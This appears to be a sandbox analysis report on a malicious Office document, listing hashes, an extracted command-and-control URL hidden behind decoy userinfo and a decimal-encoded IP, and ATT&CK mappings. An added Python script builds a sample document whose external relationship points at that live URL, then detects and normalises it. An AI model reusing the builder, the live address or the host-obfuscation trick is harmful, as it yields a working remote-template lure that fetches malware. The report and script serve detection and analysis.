General

  • Target

    d07eb11e2f72bde21377460c4eaebfa4.bin

  • Size

    7KB

  • Sample

    230209-jme6qsad2v

  • MD5

    f32b82fc5264b1a0a33c0e1d88550a9e

  • SHA1

    31d18b98c7e6d61198bc8e0e3627e3a691ec8aae

  • SHA256

    5fb235ba9153aa17a72c83561c5dc78b244006d10657cef25b1596bcbfaeae72

  • SHA512

    d868c15662aa10b643f43a70d1be670804eee76216e5653ea6838060a14c2bbcfcab77122bdcad7fb8c29d0f6e8237ff5ab855b12c4ff6e2f3725318d2a6cb7c

  • SSDEEP

    192:fmFCLx8ZWpEWaSrmuLIWf21vsEB1udHFCPDmWya8wjna12VwI:+FCeCm7i21v/B1GHQPZn7V5

Score
10/10

Malware Config

Extracted

Rule
Microsoft Office WebSettings Relationship
C2

http://dgdfg00000000hfjf0000000ghfghfgh000000gfhfg0000hfgsdgfggd0000fgdfge00000rtdfgd00000fg00dfg@3221479282/78.doc

(The long string before the "@" is URL userinfo, not the host. The host is the decimal-encoded IPv4 address 3221479282, which is 192.3.223.114, so the effective fetch is http://192.3.223.114/78.doc.)

Targets

    • Target

      533ec2002e6dcf5cc585823bacd4647a1fb83758993ba716be76f24c0a2fa2ae.doc

    • Size

      10KB

    • MD5

      d07eb11e2f72bde21377460c4eaebfa4

    • SHA1

      729b4f7d337e88ea40c0d417bd2808f275de733e

    • SHA256

      533ec2002e6dcf5cc585823bacd4647a1fb83758993ba716be76f24c0a2fa2ae

    • SHA512

      7a0f0fdecbdc2a8c9b78791b776c95d9a58fb857be65bc0d57b28508eab0080a44f0a16e0d1114e7b2146705186376dbffef22bc0a4ef918ae51c2087db2b66a

    • SSDEEP

      192:ScIMmtP5hG/b7XN+eO/xXkO+5+5F7Jar/YEChI3UqR:SPXRE7XtOJXk7wtar/YECOUe

    Score
    8/10

    • Blocklisted process makes network request

    • Abuses OpenXML format to download file from external location
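The two findings above (the extracted "Microsoft Office WebSettings Relationship" config and the "abuses OpenXML format to download file from external location" signature) come down to one thing: a `.rels` part inside the OOXML zip carries a `Relationship` with `TargetMode="External"` whose `Target` is the C2 URL. The following script is an added example, not part of this report or of any sandbox vendor's code. It builds a constructed, minimal in-memory document that mimics that layout (the `frame` relationship type and the part names are assumptions reflecting the common webSettings variant), lists every external relationship, and normalises the obfuscated URL by dropping the userinfo and converting the decimal host to dotted-quad.

```python
"""Find external relationship targets in an OOXML document and normalise the
obfuscated URL. Added example; the sample document is constructed inline."""
import io
import ipaddress
import re
import xml.etree.ElementTree as ET
import zipfile
from urllib.parse import urlsplit

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

# C2 URL copied verbatim from the report's extracted config.
C2_URL = ("http://dgdfg00000000hfjf0000000ghfghfgh000000gfhfg0000hfgsdgfggd0000"
          "fgdfge00000rtdfgd00000fg00dfg@3221479282/78.doc")


def build_sample_docx(url: str) -> bytes:
    """Constructed minimal OOXML container (assumption: only the parts needed
    to carry a webSettings relationship are present; relationship Type is the
    'frame' type used by the common webSettings-injection variant)."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        '<Relationship Id="rId1" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" '
        f'Target="{url}" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/webSettings.xml", "<w:webSettings/>")
        zf.writestr("word/_rels/webSettings.xml.rels", rels)
    return buf.getvalue()


def external_relationships(docx_bytes: bytes) -> list:
    """Return every Relationship with TargetMode="External" from every .rels
    part; these are the only places an OOXML document can point at a remote
    resource that Word fetches on open."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") == "External":
                    found.append({
                        "part": name,
                        "id": rel.get("Id"),
                        "type": rel.get("Type", "").rsplit("/", 1)[-1],
                        "target": rel.get("Target"),
                    })
    return found


def normalise_url(url: str) -> dict:
    """Strip the decoy userinfo and turn a decimal-encoded IPv4 host into
    dotted-quad so it can be matched against blocklists and proxy logs."""
    parts = urlsplit(url)
    host = parts.hostname or ""          # hostname already excludes userinfo
    if re.fullmatch(r"\d+", host):       # bare decimal integer host
        host = str(ipaddress.IPv4Address(int(host)))
    return {
        "scheme": parts.scheme,
        "userinfo": parts.username,
        "host": host,
        "path": parts.path,
        "clean_url": f"{parts.scheme}://{host}{parts.path}",
    }


if __name__ == "__main__":
    sample = build_sample_docx(C2_URL)
    for rel in external_relationships(sample):
        info = normalise_url(rel["target"])
        print(f"{rel['part']} {rel['id']} ({rel['type']}) -> {info['clean_url']}")
```

Run against a real sample, the same `external_relationships` call applies unchanged to the bytes of the `.doc` (the file is a zip despite its extension). The decimal-host form is accepted by WinINet/WinHTTP and by browsers, so the document fetches 192.3.223.114 without the IP ever appearing in the file; matching on the normalised `clean_url` rather than the raw string is what makes a blocklist hit possible.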

MITRE ATT&CK Matrix (ATT&CK v6)

  • Execution

    Exploitation for Client Execution (T1203): 1

  • Defense Evasion

    Modify Registry (T1112): 1

  • Discovery

    Query Registry (T1012): 2

    System Information Discovery (T1082): 2

Tasks